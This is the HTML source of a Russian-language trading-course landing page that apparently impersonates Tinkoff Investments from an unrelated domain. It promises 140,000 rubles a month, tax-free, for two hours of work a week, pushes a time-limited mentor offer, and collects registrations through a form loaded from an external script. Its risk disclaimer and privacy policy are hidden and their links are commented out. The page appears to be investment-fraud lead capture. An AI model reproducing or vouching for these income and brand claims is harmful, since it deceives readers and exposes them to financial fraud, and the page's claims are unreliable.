<!DOCTYPE html>
<html lang="ru">
  <head>
    <meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />
    <meta
      name="viewport"
      content="width=device-width, initial-scale=1, shrink-to-fit=no"
    />
    <link href="./img/favicon.ico" rel="icon" type="image/x-icon" />
    <title>Лёгкий старт</title>
    <link rel="canonical" href="http://tinkovdostup.uniqueoffersstart.com" />
    <link href="css/bundle.css" rel="stylesheet" />
    <link
      rel="stylesheet"
      href="https://cdn.unitedmarkets.cc/build/bundle.css?v=1637321581"
    />
  </head>
  <body>
    <main class="main">
      <header class="header">
        <div class="header__container">
          <div class="header__content">
            <img src="img/logo.png" alt="Тинькофф" class="header__logo" />
            <a href="#form-register-lead" class="header__link linkToForm link"
              >Открыть счет</a
            >
          </div>
        </div>
      </header>
      <section class="intro">
        <div class="container">
          <h1 class="intro__title">Научитесь трейдингу с нуля</h1>
          <h2 class="intro__subtitle">
            и зарабатывайте от 140 000 рублей ежемесячно, без налогов на доход!
          </h2>
          <div class="intro__grid">
            <div class="intro__video">
              <video width="100%" autoplay="" controls="" muted="" loop="">
                <source src="img/video.mp4" type="video/mp4" />
              </video>
            </div>
          </div>
        </div>
      </section>
      <section class="section features">
        <div class="container">
          <h2>Вы узнаете</h2>
          <p class="features__subtitle">
            Шаг за шагом, от простого к сложному мы покажем, как устроен рынок
            ценных бумаг
          </p>
          <div class="features__grid">
            <div class="feature-item">
              <div class="feature-item__img">
                <img src="img/education.svg" alt="" />
              </div>
              <div class="feature-item__content">
                <h5 class="feature-item__title">
                  Как грамотно составить финансовый план
                </h5>
                <p class="feature-item__text">
                  Грамотно составить финансовый план, выбрать цели
                  инвестирования и оптимизировать поток личных финансов не так
                  просто, как может показаться
                </p>
              </div>
            </div>
            <div class="feature-item">
              <div class="feature-item__img">
                <img src="img/sandclock.svg" alt="" />
              </div>
              <div class="feature-item__content">
                <h5 class="feature-item__title">
                  Как работать не больше двух часов в неделю
                </h5>
                <p class="feature-item__text">
                  Именно столько времени достаточно для эффективной работы с
                  хорошим результатом.
                </p>
              </div>
            </div>
            <div class="feature-item">
              <div class="feature-item__img">
                <img src="img/user.svg" alt="" />
              </div>
              <div class="feature-item__content">
                <h5 class="feature-item__title">
                  Ценный опыт персонального наставника
                </h5>
                <p class="feature-item__text">
                  Только в октябре, каждый участник Тинькофф.Инвестиции получает
                  персонального опытного наставника!
                </p>
              </div>
            </div>
          </div>
        </div>
      </section>
      <section class="section clients">
        <div class="container">
          <h2>Для кого</h2>
          <div class="clients__grid">
            <div class="client-item">
              <div class="client-item__img">
                <img src="img/2.png" alt="" />
              </div>
              <h4 class="client-item__title">
                Для тех, кто только начинает знакомиться с миром инвестиций
              </h4>
              <p class="client-item__text">
                Можно долго изучать литературу для начинающих, можно сразу
                начать торговать акциями и учиться на своих ошибках. Но самый
                действенный способ – обратиться за помощью к профессионалам
              </p>
            </div>
            <div></div>
            <div class="client-item">
              <div class="client-item__img">
                <img src="img/1.png" alt="" />
              </div>
              <h4 class="client-item__title">
                Для тех, кто хочет сам управлять своими финансами
              </h4>
              <p class="client-item__text">
                Отличительной особенностью по-настоящему финансово грамотного
                человека является навык планирования своих расходов и доходов.
                Проще говоря, это навык финансового планирования
              </p>
            </div>
          </div>
        </div>
      </section>
      <section class="section partners">
        <div class="container">
          <h2>Наши партнеры</h2>
          <div class="partners__grid">
            <div class="partners__item">
              <img src="img/yad.png" alt="Яндекс.Деньги" />
            </div>
            <div class="partners__item">
              <img src="img/qiwi.png" alt="Qiwi" />
            </div>
            <div class="partners__item">
              <img src="img/mc_1.png" alt="MasterCard" />
            </div>
            <div class="partners__item">
              <img src="img/myr.png" alt="МИР" />
            </div>
            <div class="partners__item">
              <img src="img/visa.png" alt="Visa" />
            </div>
          </div>
        </div>
      </section>
      <section class="section registration">
        <div class="container">
          <div class="registration__grid">
            <div class="registration__content">
              <h2>Начните зарабатывать вместе с Тинькофф Инвестиции</h2>
              <p>Регистрируйтесь сейчас и получите опытного наставника!</p>
              <div id="form-register-lead"></div>
            </div>
            <div class="registration__img">
              <img src="img/3.png" alt="" />
            </div>
          </div>
        </div>
      </section>
    </main>
    <footer class="footer">
      <div class="container">
        <div class="footer__content">
          <p>© <span class="currentYear">2022</span></p>
          <div class="footer__links">
            <!--                <a href="#policy" rel="modal:open">Политика конфиденциальности</a>-->
            <!--                <a href="#risk" rel="modal:open">Пользовательское соглашение</a>-->
          </div>
        </div>
      </div>
    </footer>
    <div id="risk" class="modal" style="display: none">
      <h2>Предупреждение о риске</h2>
      <p>
        Продолжая просматривать и использовать этот сайт, Вы соглашаетесь с
        соблюдением следующих положений и условий использования, которые
        регулируют отношения с Вами в отношении данного веб-сайта.
      </p>
      <p>
        Использование данного веб-сайта подразумевает следующие условия:
        содержимое страниц данного веб-сайта представлено только для Вашей общей
        информации. Она является предметом изменения без предварительного
        уведомления.
      </p>
      <p>
        Ни мы, ни какие-либо третьи стороны не предоставляем какие-либо гарантии
        или поручительства в отношении точности, своевременности, эффективности,
        полноты или пригодности информации и материалов, найденных или
        предлагаемых на данном веб-сайте, для любой конкретной цели. Вы
        признаете, что такая информация и материалы могут содержать неточности
        или ошибки, и мы безоговорочно исключаем свою ответственность за любые
        подобные неточности или ошибки. Использование Вами любой информации или
        материалов данного веб-сайта исключительно на свой страх и риск, за
        который мы не несем никакой ответственности. Это должна быть Ваша
        собственная ответственность в убеждении, что любые продукты, услуги или
        информация, доступные на данном сайте, отвечают вашим требованиям.
      </p>
      <p>
        Время от времени этот веб-сайт может так же содержать ссылки на другие
        веб-сайты. Эти ссылки предоставляются для Вашего удобства в получении
        дополнительной информации. Мы не несем никакой ответственности за
        содержание на веб-сайте(ах) адресованных по ссылкам. Любые ссылки, на
        другие сайты во Всемирной Паутине, никоим образом не имеют в виду, что
        связаны с этим сайтом, одобряются, поддерживаются или спонсируется им.
        Однако этот сайт может получать компенсацию от сайтов, представленных по
        этим ссылкам. Материал, представленный на данном сайте, является только
        для общих информационных целей. Информация, представленная на этом
        сайте, не гарантирована, в отношении ее точности, надежности,
        прибыльности или иного свойства. Никаких гарантий или поручительств
        любого рода не делается или не подразумеваются на этом сайте в отношении
        информации, мнения или деятельности. Сайт, его владельцы, издатели или
        инвесторы не несут ответственности, будь то на основе контракта,
        деликта, строгой ответственности или иным образом, за любые убытки или
        материальный ущерб, или иного характера последствия, вытекающие из
        любого содержимого сайта или доступа к сайту.
      </p>
      <p>
        Кроме того, гипотетическая торговля не связана с финансовыми рисками, а
        не гипотетическая торговая запись может полностью учитывать влияние
        финансового риска в реальной торговле. Например, способность выдерживать
        убытки или придерживаться определенной торговой программы, несмотря на
        убытки, являются материальные показатели, которые могут отрицательно
        повлиять на фактические результаты торговли. Существует множество других
        факторов, связанных с рынком в целом или для осуществления какой-либо
        конкретной торговой программы, которые не могут быть полностью учтены в
        подготовке к гипотетическим результатам и все это может негативно
        повлиять на фактические результаты торговли.
      </p>
      <p>
        Нет никакой гарантии, что вы сможете заработать какие-либо деньги,
        используя методы и идеи этих материалов. Примеры этих материалов не
        могут быть истолкованы как обещание или гарантия прибыли.
      </p>
      <p>
        Вариант торговли является спекулятивным, и имеет высокую степень риска.
        Из-за неустойчивости рынка, вопросов ликвидности, критического характера
        временных запасов и торгового варианта этот сайт не может гарантировать,
        что абоненты смогут отразить торги или заявленные действия. Все
        указанные цены служат только для ознакомления и ни в коей мере не
        предназначены для представления фактической торговли или входных,
        выходных пунктов торговли.
      </p>
      <p>
        Финансовые операции несут высокий уровень риска для Вашего капитала.
        Торгуйте только с деньгами, которые вы можете себе позволить потерять.
        Финансовые операции могут быть весьма неустойчивыми. Финансовые операции
        не могут быть пригодными для всех людей; поэтому убедитесь, что Вы
        полностью понимаете риски и получите независимую консультацию, если это
        необходимо. Прошлые показатели не являются индикатором будущего успеха.
        Все торги связаны с риском, который включает в себя потерю всего
        капитала.
      </p>
      <p>
        Информация, содержащаяся на этом сайте, предоставляется исключительно
        для того, чтобы Вы смогли сделать свои собственные инвестиционные
        решения, и не представляет собой какие-либо рекомендации или советы,
        чтобы заключать любые соглашения, инвестиции или сделки. Никакие
        рекомендации не выполняются (прямо или косвенно, специально или намеком)
        о достоинствах или пригодности каких-либо инвестиций или сделки и не
        дается никаких гарантий относительно полноты и достоверности этой
        информации. Вся предоставленная информация может быть истолкована
        только, как мнение, и использоваться только с информационной целью. Мы
        не несем никакой ответственности за точность или достоверность
        информации, содержащейся здесь.
      </p>
      <p>
        Ничего, что содержится на данном веб-сайте, не следует использовать, как
        любую форму инвестиционных консультаций. Наш сервис предназначен для
        частных лиц. Любое использование компанией, строго запрещено.
      </p>
      <p>
        Информация на этом сайте, не направлена против каких-либо лиц в
        какой-либо стране или юрисдикции, где такая информация или использование
        ее могли бы противоречить местному законодательству или правилам. Вы
        несете ответственность за выяснение условий и соблюдений всех местных
        законов или постановлений.
      </p>
      <p>
        Моделирующие торговые программы в основном разрабатываются с учетом
        оценки прошедших событий. Использование веб-сайта, его содержимого и
        информации относится к единоличной ответственности пользователя. Все
        права защищены.
      </p>
    </div>
    <div id="policy" class="modal" style="display: none">
      <h2>Политика Конфиденциальности сайта</h2>
      <p>
        Администрация сайта обязуется сохранять вашу конфиденциальность в
        Интернете. Мы уделяем большое значение охране предоставленных вами
        данных. Наша политика конфиденциальности основана на требованиях Общего
        регламента о защите персональных данных Европейского Союза (GDPR). Цели,
        в которых мы собираем персональные данные: улучшение работы нашего
        сервиса, осуществление контактов с посетителями данного сайта,
        предоставление информации, которую запрашивал пользователь,
        осуществление услуг, связанных с направлением деятельности данного
        сайта, а так же для указанных ниже действий.
      </p>
      <br />
      <h3>Сбор и использование персональных данных</h3>
      <p>
        Мы собираем и используем ваши персональные данные только в случае вашего
        добровольного согласия. При согласии с этим вы разрешаете нам собирать и
        использовать следующие данные: имя и фамилия, электронная почта, номер
        телефона. Сбор и обработка ваших данных проводится соответствии с
        законами, действующими на территории Европейского Союза и Российской
        Федерации.
      </p>
      <br />
      <h3>Хранение данных, изменение и удаление</h3>
      <p>
        Пользователь, предоставивший свои персональные данные сайту имеет право
        на их изменение и удаление, а так же на отзыв своего согласия с их
        использованием. Срок, в течение которого будут храниться ваши
        персональные данные: время, необходимое для использования данных для
        основной деятельности сайта. При завершении использования ваших данных
        администрация сайта удаляет их. Мы можем передавать ваши личные данные
        третьей стороне только с вашего добровольного согласия, если они были
        переданы, то изменение данных в других организациях, не связанных с
        нами, мы осуществить не можем.
      </p>
      <br />
      <h3>Использование технических данных при посещении сайта</h3>
      <p>
        При посещении вами сайта в базе данных сохраняются записи о вашем IP
        адресе, времени посещения, настройках браузера, операционной системе, а
        также другая техническая информация необходимая для корректного
        отображения содержимого сайта. По этим данным нам невозможно
        идентифицировать личность посетителя.
      </p>
      <br />
      <h3>Использование cookies</h3>
      <p>
        Для корректного отображения содержимого и для удобства использования
        сайта мы используем cookie файлы. Это небольшие файлы, которые хранятся
        на вашем устройстве. Они помогают сайту запомнить информацию о вас,
        например на каком языке вы просматриваете сайт и какие страницы вы уже
        открывали, эта информация будет полезна при следующем посещении.
        Благодаря файлам cookie просмотр сайта становится значительно более
        удобным. Вы можете настроить прием или блокировку cookie в браузере
        самостоятельно. Невозможность принимать cookie может ограничить
        работоспособность сайта.
      </p>
      <br />
      <h3>Использование персональных данных другими сервисами</h3>
      <p>
        На этом сайте используются сторонние интернет-сервисы, осуществляющие
        независимый от нас сбор информации: Facebook.com. Собранные ими данные
        могут предоставляться другим службам внутри этих организаций, они могут
        использовать данные для персонализации рекламы своей собственной
        рекламной сети. Вы можете прочитать пользовательские соглашения этих
        организаций на их сайтах. Мы не передаем персональные данные другим
        организациям и службам, не указанным в данной политике
        конфиденциальности. Исключение составляет только передача информации при
        законных требованиях государственных органов уполномоченных осуществлять
        данные действия.
      </p>
      <br />
      <h3>Ссылки на другие сайты</h3>
      <p>
        Наш сайт может содержать ссылки на другие сайты, которые не управляются
        нами. Мы не несем ответственность за их содержание. Мы рекомендуем вам
        ознакомиться с политикой конфиденциальности каждого сайта, который вы
        посещаете, если она там есть.
      </p>
      <br />
      <h3>Изменения в политике конфиденциальности</h3>
      <p>
        Наш сайт может обновлять нашу политику конфиденциальности время от
        времени. Мы сообщаем о любых изменениях, разместив новую политику
        конфиденциальности на этой странице. Мы отслеживаем изменения
        законодательства, касающегося персональных данных в Европейском Союзе и
        Российской Федерации. Если вы оставили персональные данные у нас, то мы
        оповестим вас об изменении в политике конфиденциальности. Если ваши
        персональные данные были введены не корректно, то мы не сможем с вами
        связаться. Связаться с администрацией сайта по вопросам, связанным с
        политикой конфиденциальности можно с помощью контактной формы указанной
        в соответствующем разделе данного сайта. Если вы не согласны с данной
        политикой конфиденциальности, вы не можете пользоваться услугами сайта.
        В этом случае вы должны воздержаться от посещения нашего сайта.
      </p>
    </div>
    <script src="jquery-3.6.0.min.js"></script>
    <script src="ajax/libs/jquery.inputmask/5.0.7/jquery.inputmask.min.js"></script>
    <script src="npm/sweetalert2_11.js"></script>
    <script defer="" src="js/script.js"></script>
    <script defer="">
      window.serverProps = {
        oldInputs: null,
        validationErrors: null,
        server_error_code: null,
        frod_autologin_url: null,
      };
    </script>

    <script
      defer=""
      src="https://cdn.unitedmarkets.cc/build/bundle.js?v=1637321581"
    ></script>
  </body>
</html>
